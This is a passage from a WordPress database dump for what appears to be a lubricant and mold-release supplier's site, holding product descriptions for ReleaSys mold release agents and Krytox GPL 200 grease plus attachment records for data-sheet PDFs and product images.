mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. ReleaSys 8900 Urethane mold release agent excels particularly as a composite and urethane release agent\r\n<h3>Application Efficient and Cost-Effective</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of semi-permanent mold release agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency. Release agents are an integral part of many manufacturing processes. They are often necessary, but are not frequently understood for the value that they can add. Specialty release agents can enhance productivity, extend tool/die/mold life, increase cycle times, improve part/surface quality and reduce scrap and defect rates, just to name a few of the many potential benefits.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>\r\n\r\nWe have focused on taking the message to our customers that more is not necessarily better when it comes to applying mold release agents. Today’s highly sophisticated water-based or solvent-based Semi-permanent mold release agents ( Urethane mold release agent ) technologies do more with less:\r\n<ul>\r\n 	<li>You can obtain many mold releases between applications</li>\r\n 	<li>More molding cycles can be attained per working shift due to efficient release ease and the need to apply the release system less frequently</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n 	<li>Scrap can be significantly reduced</li>\r\n 	<li>Molds can remain in production for extended periods of time due to the low contribution by the release system itself to in-mold build-up and the extremely high mold protection properties provided</li>\r\n 	<li>Complicated parts can be made in a trouble-free manner since products with elevated lubricity can be specified where appropriate</li>\r\n 	<li>Molded parts retain consistently good cosmetic appearance</li>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n</ul>', 'ReleaSys™ 8900 | Urethane Mold Release Agent', 'ReleaSys 8900 is a solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding application or abrasive substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Ideal for Composites and Urethanes</li>\r\n 	<li>Fast evaporation and cure time</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'urethane-mold-release-agent', '', '', '2017-06-16 16:56:59', '2017-06-16 16:56:59', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=310', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (311, 3, '2016-08-17 19:57:14', '2016-08-17 19:57:14', '', 'ReleaSys 8900', '', 'inherit', 'open', 'closed', '', 'releasys-8900', '', '', '2016-08-17 19:57:14', '2016-08-17 19:57:14', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-8900.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (312, 1, '2016-08-18 00:45:06', '2016-08-18 00:45:06', '', 'Technical Data', '', 'publish', 'closed', 'closed', '', 'technical-data', '', '', '2017-06-07 14:33:46', '2017-06-07 14:33:46', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=312', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (317, 1, '2016-08-18 01:24:04', '2016-08-18 01:24:04', '', 'Sizes Available', '', 'publish', 'closed', 'closed', '', 'sizes-available', '', '', '2016-09-27 13:30:28', '2016-09-27 13:30:28', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=317', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (318, 1, '2016-08-18 01:29:33', '2016-08-18 01:29:33', '', 'Data Sheets', '', 'publish', 'closed', 'closed', '', 'data-sheets', '', '', '2016-09-27 13:31:02', '2016-09-27 13:31:02', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=318', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (320, 1, '2016-08-18 02:01:01', '2016-08-18 02:01:01', '', 'Calendar Print Preview', '', 'inherit', 'open', 'closed', '', 'calendar-print-preview-2', '', '', '2016-08-18 02:01:01', '2016-08-18 02:01:01', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Calendar-Print-Preview-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (321, 3, '2016-08-18 12:07:28', '2016-08-18 12:07:28', '', '122AV', '', 'inherit', 'open', 'closed', '', '122av', '', '', '2016-08-18 12:07:28', '2016-08-18 12:07:28', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/122AV.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (322, 3, '2016-08-18 12:07:29', '2016-08-18 12:07:29', '', '122SE', '', 'inherit', 'open', 'closed', '', '122se', '', '', '2016-08-18 12:07:29', '2016-08-18 12:07:29', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/122SE.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (323, 3, '2016-08-18 12:07:29', '2016-08-18 12:07:29', '', '143TE', '', 'inherit', 'open', 'closed', '', '143te', '', '', '2016-08-18 12:07:29', '2016-08-18 12:07:29', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/143TE.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (324, 3, '2016-08-18 12:07:30', '2016-08-18 12:07:30', '', '550N-552N', '', 'inherit', 'open', 'closed', '', '550n-552n', '', '', '2016-08-18 12:07:30', '2016-08-18 12:07:30', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/550N-552N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (325, 3, '2016-08-18 12:07:31', '2016-08-18 12:07:31', '', '580N-582NB', '', 'inherit', 'open', 'closed', '', '580n-582nb', '', '', '2016-08-18 12:07:31', '2016-08-18 12:07:31', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/580N-582NB.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (326, 3, '2016-08-18 12:07:34', '2016-08-18 12:07:34', '', 'At-A-Glance', '', 'inherit', 'open', 'closed', '', 'at-a-glance', '', '', '2016-08-18 12:07:34', '2016-08-18 12:07:34', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/At-A-Glance.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (327, 3, '2016-08-18 12:07:36', '2016-08-18 12:07:36', '', 'Dental Lubricant instructions', '', 'inherit', 'open', 'closed', '', 'dental-lubricant-instructions', '', '', '2016-08-18 12:07:36', '2016-08-18 12:07:36', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Dental-Lubricant-instructions.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (328, 3, '2016-08-18 12:07:39', '2016-08-18 12:07:39', '', 'Dental', '', 'inherit', 'open', 'closed', '', 'dental', '', '', '2016-08-18 12:07:39', '2016-08-18 12:07:39', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Dental.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (329, 3, '2016-08-18 12:07:42', '2016-08-18 12:07:42', '', 'Fluoropolymer PTFE coatings', '', 'inherit', 'open', 'closed', '', 'fluoropolymer-ptfe-coatings', '', '', '2016-08-18 12:07:42', '2016-08-18 12:07:42', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Fluoropolymer-PTFE-coatings.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (330, 3, '2016-08-18 12:07:45', '2016-08-18 12:07:45', '', 'Krytox Tri-Fold', '', 'inherit', 'open', 'closed', '', 'krytox-tri-fold', '', '', '2016-08-18 12:07:45', '2016-08-18 12:07:45', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox-Tri-Fold.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (331, 3, '2016-08-18 12:07:47', '2016-08-18 12:07:47', '', 'milGlide advanced medical lubricants', '', 'inherit', 'open', 'closed', '', 'milglide-advanced-medical-lubricants', '', '', '2016-08-18 12:07:47', '2016-08-18 12:07:47', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milGlide-advanced-medical-lubricants.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (332, 3, '2016-08-18 12:07:49', '2016-08-18 12:07:49', '', 'milGlide master batch', '', 'inherit', 'open', 'closed', '', 'milglide-master-batch', '', '', '2016-08-18 12:07:49', '2016-08-18 12:07:49', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milGlide-master-batch.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (333, 3, '2016-08-18 12:07:51', '2016-08-18 12:07:51', '', 'milLube advanced medical lubricants', '', 'inherit', 'open', 'closed', '', 'millube-advanced-medical-lubricants', '', '', '2016-08-18 12:07:51', '2016-08-18 12:07:51', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milLube-advanced-medical-lubricants.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (334, 3, '2016-08-18 12:07:52', '2016-08-18 12:07:52', '', 'milPure specialty solvents', '', 'inherit', 'open', 'closed', '', 'milpure-specialty-solvents', '', '', '2016-08-18 12:07:52', '2016-08-18 12:07:52', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milPure-specialty-solvents.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (335, 3, '2016-08-18 12:07:54', '2016-08-18 12:07:54', '', 'milShield advanced medical lubricants', '', 'inherit', 'open', 'closed', '', 'milshield-advanced-medical-lubricants', '', '', '2016-08-18 12:07:54', '2016-08-18 12:07:54', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milShield-advanced-medical-lubricants.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (336, 3, '2016-08-18 12:07:54', '2016-08-18 12:07:54', '', 'MS-780, 782', '', 'inherit', 'open', 'closed', '', 'ms-780-782', '', '', '2016-08-18 12:07:54', '2016-08-18 12:07:54', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-780-782.doc', 0, 'attachment', 'application/msword', 0); 
INSERT INTO `wp_posts` VALUES (337, 3, '2016-08-18 12:07:55', '2016-08-18 12:07:55', '', 'ReleaSys 82', '', 'inherit', 'open', 'closed', '', 'releasys-82', '', '', '2016-08-18 12:07:55', '2016-08-18 12:07:55', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-82.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (338, 3, '2016-08-18 12:07:56', '2016-08-18 12:07:56', '', 'ReleaSys 85', '', 'inherit', 'open', 'closed', '', 'releasys-85', '', '', '2016-08-18 12:07:56', '2016-08-18 12:07:56', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-85.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (339, 3, '2016-08-18 12:07:57', '2016-08-18 12:07:57', '', 'ReleaSys 88', '', 'inherit', 'open', 'closed', '', 'releasys-88', '', '', '2016-08-18 12:07:57', '2016-08-18 12:07:57', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-88.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (340, 3, '2016-08-18 12:07:58', '2016-08-18 12:07:58', '', 'ReleaSys 89', '', 'inherit', 'open', 'closed', '', 'releasys-89', '', '', '2016-08-18 12:07:58', '2016-08-18 12:07:58', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-89.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (341, 3, '2016-08-18 12:07:59', '2016-08-18 12:07:59', '', 'ReleaSys 8200', '', 'inherit', 'open', 'closed', '', 'releasys-8200-2', '', '', '2016-08-18 12:07:59', '2016-08-18 12:07:59', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-8200.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (342, 3, '2016-08-18 12:08:01', '2016-08-18 12:08:01', '', 'ReleaSys 8500', '', 'inherit', 'open', 'closed', '', 'releasys-8500-2', '', '', '2016-08-18 12:08:01', '2016-08-18 12:08:01', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-8500.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (343, 3, '2016-08-18 12:08:02', '2016-08-18 12:08:02', '', 'ReleaSys 8800', '', 'inherit', 'open', 'closed', '', 'releasys-8800-2', '', '', '2016-08-18 12:08:02', '2016-08-18 12:08:02', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-8800.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (344, 3, '2016-08-18 12:08:03', '2016-08-18 12:08:03', '', 'ReleaSys 8900', '', 'inherit', 'open', 'closed', '', 'releasys-8900-2', '', '', '2016-08-18 12:08:03', '2016-08-18 12:08:03', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-8900.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (345, 3, '2016-08-18 12:08:04', '2016-08-18 12:08:04', '', 'ReleaSys Product Guide', '', 'inherit', 'open', 'closed', '', 'releasys-product-guide', '', '', '2016-08-18 12:08:04', '2016-08-18 12:08:04', '', 310, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (346, 3, '2016-08-18 12:18:32', '0000-00-00 00:00:00', '', 'GPL 107', '', 'draft', 'open', 'closed', '', '', '', '', '2016-08-18 12:18:32', '2016-08-18 12:18:32', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=346', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (347, 2, '2016-08-18 12:26:49', '2016-08-18 12:26:49', 'Krytox GPL 200 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below – 8 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 200 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 200', 'Krytox GPL 200 has a Oil Viscosity of 5.5 cSt at 40°C. GPL 200 is the least viscous and GPL 207 is the most viscous.\r\n<br/><br/>\r\nEstimated useful temperature range is -70°C to 66°C.\r\n<br/><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-200', '', '', '2017-02-08 13:36:43', '2017-02-08 13:36:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=347', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (348, 2, '2016-08-18 12:24:15', '2016-08-18 12:24:15', '', 'Aerospace PDF', '', 'inherit', 'open', 'closed', '', 'aerospace-pdf', '', '', '2016-08-18 12:24:15', '2016-08-18 12:24:15', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Aerospace-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (349, 2, '2016-08-18 12:24:29', '2016-08-18 12:24:29', '', 'Automotive PDF', '', 'inherit', 'open', 'closed', '', 'automotive-pdf', '', '', '2016-08-18 12:24:29', '2016-08-18 12:24:29', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Automotive-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (350, 2, '2016-08-18 12:24:34', '2016-08-18 12:24:34', '', 'Chemical Stability PDF', '', 'inherit', 'open', 'closed', '', 'chemical-stability-pdf', '', '', '2016-08-18 12:24:34', '2016-08-18 12:24:34', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemical-Stability-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (351, 2, '2016-08-18 12:24:39', '2016-08-18 12:24:39', '', 'FPG 028', '', 'inherit', 'open', 'closed', '', 'fpg-028', '', '', '2016-08-18 12:24:39', '2016-08-18 12:24:39', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/FPG-028.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (352, 2, '2016-08-18 12:24:43', '2016-08-18 12:24:43', '', 'FPG 182 PDF', '', 'inherit', 'open', 'closed', '', 'fpg-182-pdf', '', '', '2016-08-18 12:24:43', '2016-08-18 12:24:43', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/FPG-182-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (353, 2, '2016-08-18 12:24:48', '2016-08-18 12:24:48', '', 'GPL 226227', '', 'inherit', 'open', 'closed', '', 'gpl-226227', '', '', '2016-08-18 12:24:48', '2016-08-18 12:24:48', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL-226227.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (354, 2, '2016-08-18 12:24:52', '2016-08-18 12:24:52', '', 'GPL PDF', '', 'inherit', 'open', 'closed', '', 'gpl-pdf', '', '', '2016-08-18 12:24:52', '2016-08-18 12:24:52', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (355, 2, '2016-08-18 12:24:56', '2016-08-18 12:24:56', '', 'Krytox Compatibility', '', 'inherit', 'open', 'closed', '', 'krytox-compatibility', '', '', '2016-08-18 12:24:56', '2016-08-18 12:24:56', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox-Compatibility.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (357, 2, '2016-08-18 12:25:05', '2016-08-18 12:25:05', '', 'LVP PDF', '', 'inherit', 'open', 'closed', '', 'lvp-pdf', '', '', '2016-08-18 12:25:05', '2016-08-18 12:25:05', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/LVP-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (358, 2, '2016-08-18 12:25:10', '2016-08-18 12:25:10', '', 'MIL PRF PDF', '', 'inherit', 'open', 'closed', '', 'mil-prf-pdf', '', '', '2016-08-18 12:25:10', '2016-08-18 12:25:10', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MIL-PRF-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (359, 2, '2016-08-18 12:25:14', '2016-08-18 12:25:14', '', 'Reactive Chemicals PDF', '', 'inherit', 'open', 'closed', '', 'reactive-chemicals-pdf', '', '', '2016-08-18 12:25:14', '2016-08-18 12:25:14', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Reactive-Chemicals-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (360, 2, '2016-08-18 12:25:19', '2016-08-18 12:25:19', '', 'TS4 PDF', '', 'inherit', 'open', 'closed', '', 'ts4-pdf', '', '', '2016-08-18 12:25:19', '2016-08-18 12:25:19', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/TS4-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (361, 2, '2016-08-18 12:25:35', '2016-08-18 12:25:35', '', 'XHT PDF', '', 'inherit', 'open', 'closed', '', 'xht-pdf', '', '', '2016-08-18 12:25:35', '2016-08-18 12:25:35', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/XHT-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (363, 2, '2016-08-18 12:36:11', '2016-08-18 12:36:11', '', '1 oz Dropper Bottle', '', 'inherit', 'open', 'closed', '', '1-oz-dropper-bottle', '', '', '2016-08-18 12:36:11', '2016-08-18 12:36:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1-oz-Dropper-Bottle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (364, 2, '2016-08-18 12:36:17', '2016-08-18 12:36:17', '', '2 oz Dropper Bottle', '', 'inherit', 'open', 'closed', '', '2-oz-dropper-bottle', '', '', '2016-08-18 12:36:17', '2016-08-18 12:36:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/2-oz-Dropper-Bottle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (365, 2, '2016-08-18 12:36:23', '2016-08-18 12:36:23', '', '4 oz Bottle', '', 'inherit', 'open', 'closed', '', '4-oz-bottle', '', '', '2016-08-18 12:36:23', '2016-08-18 12:36:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/4-oz-Bottle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (366, 2, '2016-08-18 12:36:29', '2016-08-18 12:36:29', '', '8 oz Dropper Bottle', '', 'inherit', 'open', 'closed', '', '8-oz-dropper-bottle', '', '', '2016-08-18 12:36:29', '2016-08-18 12:36:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/8-oz-Dropper-Bottle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (367, 2, '2016-08-18 12:36:37', '2016-08-18 12:36:37', '', '20160812_104823', '', 'inherit', 'open', 'closed', '', '20160812_104823', '', '', '2016-08-18 12:36:37', '2016-08-18 12:36:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_104823.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (368, 2, '2016-08-18 12:36:46', '2016-08-18 12:36:46', '', '20160812_104844', '', 'inherit', 'open', 'closed', '', '20160812_104844', '', '', '2016-08-18 12:36:46', '2016-08-18 12:36:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_104844.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (369, 2, '2016-08-18 12:36:53', '2016-08-18 12:36:53', '', '20160812_104927', '', 'inherit', 'open', 'closed', '', '20160812_104927', '', '', '2016-08-18 12:36:53', '2016-08-18 12:36:53', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_104927.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (370, 2, '2016-08-18 12:37:01', '2016-08-18 12:37:01', '', '20160812_104940', '', 'inherit', 'open', 'closed', '', '20160812_104940', '', '', '2016-08-18 12:37:01', '2016-08-18 12:37:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_104940.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (371, 2, '2016-08-18 12:37:09', '2016-08-18 12:37:09', '', '20160812_104953', '', 'inherit', 'open', 'closed', '', '20160812_104953', '', '', '2016-08-18 12:37:09', '2016-08-18 12:37:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_104953.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (372, 2, '2016-08-18 12:37:16', '2016-08-18 12:37:16', '', '20160812_105006', '', 'inherit', 'open', 'closed', '', '20160812_105006', '', '', '2016-08-18 12:37:16', '2016-08-18 12:37:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_105006.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (373, 2, '2016-08-18 12:37:24', '2016-08-18 12:37:24', '', '20160812_141944', '', 'inherit', 'open', 'closed', '', '20160812_141944', '', '', '2016-08-18 12:37:24', '2016-08-18 12:37:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/20160812_141944.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (374, 2, '2016-08-18 12:37:29', '2016-08-18 12:37:29', '', 'Chemours Krytox Grease .5 oz tube 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-5-oz-tube-300-dpi', '', '', '2016-08-18 12:37:29', '2016-08-18 12:37:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-.5-oz-tube-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (375, 2, '2016-08-18 12:37:31', '2016-08-18 12:37:31', '', 'Chemours Krytox Grease 0.5 kg Red Top 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-0-5-kg-red-top-300-dpi', '', '', '2016-08-18 12:37:31', '2016-08-18 12:37:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (376, 2, '2016-08-18 12:37:34', '2016-08-18 12:37:34', '', 'Chemours Krytox Grease 0.8 kg cartridge 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-0-8-kg-cartridge-300-dpi', '', '', '2016-08-18 12:37:34', '2016-08-18 12:37:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (377, 2, '2016-08-18 12:37:56', '2016-08-18 12:37:56', '', 'Chemours Krytox Grease 0.8 kg cartridge Horz 300 dpi', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-0-8-kg-cartridge-horz-300-dpi', '', '', '2016-08-18 12:37:56', '2016-08-18 12:37:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi.jpg', 0, 'attachment', 'image/jpeg', 0); 
